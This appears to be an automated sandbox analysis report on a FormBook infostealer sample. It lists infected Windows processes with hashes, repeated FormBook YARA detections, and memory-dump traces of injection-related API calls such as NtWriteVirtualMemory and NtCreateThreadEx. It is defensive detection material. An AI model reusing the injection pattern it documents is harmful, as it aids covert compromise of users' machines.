                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 22%, ReversingLabs
                                                  Reputation:low

                                                  Target ID:9
                                                  Start time:12:07:32
                                                  Start date:08/08/2022
                                                  Path:C:\Windows\SysWOW64\notepad.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\notepad.exe /Processid:{9A42BBC4-4F4B-4518-841E-56E3DAA7341B}
                                                  Imagebase:0x570000
                                                  File size:179712 bytes
                                                  MD5 hash:A4F6DF0E33E644E802C8798ED94D80EA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:moderate

                                                  Target ID:10
                                                  Start time:12:07:39
                                                  Start date:08/08/2022
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Explorer.EXE
                                                  Imagebase:0xff040000
                                                  File size:3229696 bytes
                                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:high

                                                  Target ID:11
                                                  Start time:12:08:19
                                                  Start date:08/08/2022
                                                  Path:C:\Windows\SysWOW64\NAPSTAT.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\NAPSTAT.EXE
                                                  Imagebase:0xa00000
                                                  File size:279552 bytes
                                                  MD5 hash:4AF92E1821D96E4178732FC04D8FD69C
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:moderate

                                                  Target ID:13
                                                  Start time:12:09:10
                                                  Start date:08/08/2022
                                                  Path:C:\Program Files (x86)\Mozilla Firefox\firefox.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Program Files (x86)\Mozilla Firefox\Firefox.exe
                                                  Imagebase:0x190000
                                                  File size:517064 bytes
                                                  MD5 hash:C2D924CE9EA2EE3E7B7E6A7C476619CA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:moderate


                                                    Execution Graph

                                                    Execution Coverage:15.3%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:39%
                                                    Total number of Nodes:77
                                                    Total number of Limit Nodes:4

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.945566333.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1f0000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (4l$(4l
                                                    • API String ID: 0-2463812532
                                                    • Opcode ID: 3134f554ff862f6f4bceb71a6ebd2c884d1dca7f8c54011fa31f2a67640a3b53
                                                    • Instruction ID: f0eff3df447001bbbb9126642a35580bb7b389c7deecbcedd3e8f993cac8b7b2
                                                    • Opcode Fuzzy Hash: 3134f554ff862f6f4bceb71a6ebd2c884d1dca7f8c54011fa31f2a67640a3b53
                                                    • Instruction Fuzzy Hash: 78C1C131A04209DFCB1CEB74DAA157D7BB2ABC5358B65542ED206EF7A4EF309C018B91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.945814327.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_340000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 88d7d9ff23a9782bf15f3e5d1fa2ebcc5c1d54cb857099a3505585f75f62a511
                                                    • Instruction ID: 5d0299a42e72edad920cca02008891fa7772004837b54706b880444a8b4d8c03
                                                    • Opcode Fuzzy Hash: 88d7d9ff23a9782bf15f3e5d1fa2ebcc5c1d54cb857099a3505585f75f62a511
                                                    • Instruction Fuzzy Hash: 36031DB4E00215CFC760EF78C984B99B7F5BB48348F2044AA991DE3759DB386E848F65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    control_flow_graph 1345 e9d700-e9d74e 1347 e9d75e-e9d79d NtWriteVirtualMemory 1345->1347 1348 e9d750-e9d75c 1345->1348 1350 e9d79f-e9d7a5 1347->1350 1351 e9d7a6-e9d7cb 1347->1351 1348->1347 1350->1351
                                                    APIs
                                                    • NtWriteVirtualMemory.NTDLL(?,?,00000000,?,?), ref: 00E9D790
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.947112008.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_e90000_Client.jbxd
                                                    Similarity
                                                    • API ID: MemoryVirtualWrite
                                                    • String ID:
                                                    • API String ID: 3527976591-0
                                                    • Opcode ID: 67451ff85fcab7bbe7de3266b5106d5907d5b7621428f0b7e72268138e7b7fa3
                                                    • Instruction ID: a8b17304b3a7537cb8c033494bd0ae6026252614cc6d2bd964b4e171e088df1d
                                                    • Opcode Fuzzy Hash: 67451ff85fcab7bbe7de3266b5106d5907d5b7621428f0b7e72268138e7b7fa3
                                                    • Instruction Fuzzy Hash: 282105759042189FCF10DFA9D884BDEBBF4FF48314F50882AE919B7240D7749944CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    control_flow_graph 1355 4c4b8d8-4c4b977 NtCreateThreadEx 1358 4c4b980-4c4b9a5 1355->1358 1359 4c4b979-4c4b97f 1355->1359 1359->1358
                                                    APIs
                                                    • NtCreateThreadEx.NTDLL(?,6DE1FA28,?,?,?,00000000,?,?,?,?,?), ref: 04C4B96A
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955712722.0000000004C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4c40000_Client.jbxd
                                                    Similarity
                                                    • API ID: CreateThread
                                                    • String ID:
                                                    • API String ID: 2422867632-0
                                                    • Opcode ID: 2f9b8ada1c4de2b8693dea63323a0222800b77a758b929966916ca228404e46a
                                                    • Instruction ID: c6c6ef0adf1961a4ab6fcb270bee66bc13052a50738d5d59bbda8a983e2d8920
                                                    • Opcode Fuzzy Hash: 2f9b8ada1c4de2b8693dea63323a0222800b77a758b929966916ca228404e46a
                                                    • Instruction Fuzzy Hash: A3213972900219ABDF00CFA9C844AEEBBB5FF48314F15851AE918B3250C779A964CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    control_flow_graph 1363 e9d1f0-e9d286 NtProtectVirtualMemory 1366 e9d288-e9d28e 1363->1366 1367 e9d28f-e9d2b4 1363->1367 1366->1367
                                                    APIs
                                                    • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 00E9D279
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.947112008.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_e90000_Client.jbxd
                                                    Similarity
                                                    • API ID: MemoryProtectVirtual
                                                    • String ID:
                                                    • API String ID: 2706961497-0
                                                    • Opcode ID: 510f2cf9f9046f339dba207288769a7fb27d53c638c13741c7da4dec90b5fd46
                                                    • Instruction ID: 4dc2442724c1fe22b10e6957d17ad10973f17949b082aec10e689bacdf8a2285
                                                    • Opcode Fuzzy Hash: 510f2cf9f9046f339dba207288769a7fb27d53c638c13741c7da4dec90b5fd46
                                                    • Instruction Fuzzy Hash: 0321F2B1D006099FCB10CFAAD884AEEFBF4BF48314F60842EE519B7250C775A904CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    control_flow_graph 1379 e9cd08-e9cd98 NtAllocateVirtualMemory 1382 e9cd9a-e9cda0 1379->1382 1383 e9cda1-e9cdc6 1379->1383 1382->1383
                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 00E9CD8B
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.947112008.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_e90000_Client.jbxd
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: cec5eebf0d793cdef82a3f315f205be255efb3ded0786d974c845ca7cfe3f063
                                                    • Instruction ID: 97829d41dc0e48b631d517325e0261459c85fe9f6c2cc816587f289c13487e21
                                                    • Opcode Fuzzy Hash: cec5eebf0d793cdef82a3f315f205be255efb3ded0786d974c845ca7cfe3f063
                                                    • Instruction Fuzzy Hash: A42114719002099FCF10DFAAD884ADEFBF4BF48314F60842AE519B7250CB749904CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    control_flow_graph 1387 1f2498-1f2521 NtQuerySystemInformation 1390 1f252a-1f254f 1387->1390 1391 1f2523-1f2529 1387->1391 1391->1390
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 001F2514
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.945566333.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1f0000_Client.jbxd
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: e2c52f25decc2febf2a70db2de7b2dbdb5efb34a32f4042a57896c7d258241a6
                                                    • Instruction ID: 7a59d8d0665f81c4b3304f04fb028ffc4cece544f57cf1e42a532e2f340b96f8
                                                    • Opcode Fuzzy Hash: e2c52f25decc2febf2a70db2de7b2dbdb5efb34a32f4042a57896c7d258241a6
                                                    • Instruction Fuzzy Hash: D52125719042089ECB10CFAAD8847EEFBF0AF49314F20841ED419B7250CB759945CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                     Control-flow Graph (block colouring for executed / not executed is not preserved in this text export)
                                                     • 1403: 363550-3635da, calls LdrLoadDll → 1406, 1407
                                                     • 1407: 3635dc-3635e2 → 1406
                                                     • 1406: 3635e3-363608
                                                    APIs
                                                    • LdrLoadDll.NTDLL(?,?,?,?), ref: 003635CD
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.945869489.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_360000_Client.jbxd
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: 2a77e5dfeed9d1c8cacaa303a0f611e55c67655a4e034c5e6a56eefebd0ea2ba
                                                    • Instruction ID: 9a5bff1ff8ff02125f9522e26ad1f4de400e2a5f4818bc0f4c3ca2041388df24
                                                    • Opcode Fuzzy Hash: 2a77e5dfeed9d1c8cacaa303a0f611e55c67655a4e034c5e6a56eefebd0ea2ba
                                                    • Instruction Fuzzy Hash: 71210771D006089FCB10DFAAD884ADEFBF4BF49314F51881EE519A7240C7749A44CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                     Control-flow Graph (block colouring for executed / not executed is not preserved in this text export)
                                                     • 1411: 4c4b3f8-4c4b47c, calls NtWriteVirtualMemory → 1414, 1415
                                                     • 1415: 4c4b47e-4c4b484 → 1414
                                                     • 1414: 4c4b485-4c4b4aa
                                                    APIs
                                                    • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 04C4B46F
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955712722.0000000004C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4c40000_Client.jbxd
                                                    Similarity
                                                    • API ID: MemoryVirtualWrite
                                                    • String ID:
                                                    • API String ID: 3527976591-0
                                                    • Opcode ID: b795bc1de0ef059ec4f343500f969bdfa20d0055aa88d4a4abad3bb538f9de56
                                                    • Instruction ID: 64c96eb94961fbc934a065496713df5d2df21f9e09743806fec5472c62120299
                                                    • Opcode Fuzzy Hash: b795bc1de0ef059ec4f343500f969bdfa20d0055aa88d4a4abad3bb538f9de56
                                                    • Instruction Fuzzy Hash: 572115B1D006089BDB10CFAAC8446AEFBF5AF88314F50841AE519A7250DB74A904CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                     Control-flow Graph (block colouring for executed / not executed is not preserved in this text export)
                                                     • 1419: 1f24a0-1f2521, calls NtQuerySystemInformation → 1422, 1423
                                                     • 1423: 1f2523-1f2529 → 1422
                                                     • 1422: 1f252a-1f254f
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 001F2514
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.945566333.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1f0000_Client.jbxd
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: 560a648e3734a97fa6d017f5c1b7f7811fd8277324ff95b0337e03b34ef6fff0
                                                    • Instruction ID: ef7916377283c87366870935e9927ca065e2faef12bbdd51fc93e4c8c1473b00
                                                    • Opcode Fuzzy Hash: 560a648e3734a97fa6d017f5c1b7f7811fd8277324ff95b0337e03b34ef6fff0
                                                    • Instruction Fuzzy Hash: 9C11E5719046089BDB10DFAAC8447EEFBF4AF49214F61841ED519A7250DB749944CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtResumeThread.NTDLL(?,?), ref: 00E9F16E
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.947112008.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_e90000_Client.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: dd68ae53b550a509fd821cd2df29d77968bbd8552fe5b3e9be1122a64a17acc4
                                                    • Instruction ID: 49d5e6fcb0d223762cb2aeef5335b50fff69ee3a8cf6a2c11c0635cfea4db3a7
                                                    • Opcode Fuzzy Hash: dd68ae53b550a509fd821cd2df29d77968bbd8552fe5b3e9be1122a64a17acc4
                                                    • Instruction Fuzzy Hash: D1111AB1D046089ADB10DFAAC44479FFBF4AF49214F61842ED419B7240CB749904CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtSetContextThread.NTDLL(?,?), ref: 00E9DC75
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.947112008.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_e90000_Client.jbxd
                                                    Similarity
                                                    • API ID: ContextThread
                                                    • String ID:
                                                    • API String ID: 1591575202-0
                                                    • Opcode ID: abc8181689a016b820dc0030d86bf68338db98de33ce46c95e51ced9c9b30974
                                                    • Instruction ID: 80498a5bb214e2ae3eb9024550663971def94e08edbc6ee05014e62837fd6883
                                                    • Opcode Fuzzy Hash: abc8181689a016b820dc0030d86bf68338db98de33ce46c95e51ced9c9b30974
                                                    • Instruction Fuzzy Hash: E41128719046088BDB10DFAAD8457EFFBF5AF89318F21881ED515B7240CB79A944CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.945566333.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1f0000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ffff
                                                    • API String ID: 0-3827681309
                                                    • Opcode ID: ae61b51661752a1e0dfcac49a6b19be508f68f8bd59f19847a55008ba16d532e
                                                    • Instruction ID: 983ef07113955b900c9f7953a3620151b43dac598b7c9a901b0cba079c18a943
                                                    • Opcode Fuzzy Hash: ae61b51661752a1e0dfcac49a6b19be508f68f8bd59f19847a55008ba16d532e
                                                    • Instruction Fuzzy Hash: BC91B274A003099FCB09DFA5D8909EEBBB6FF88310F258529E511EB761DB70AD45CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.955712722.0000000004C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4c40000_Client.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 07d355589c84a3d8716419c67fbd7b30804c6ddaec4c4eaaec392c52054ac41f
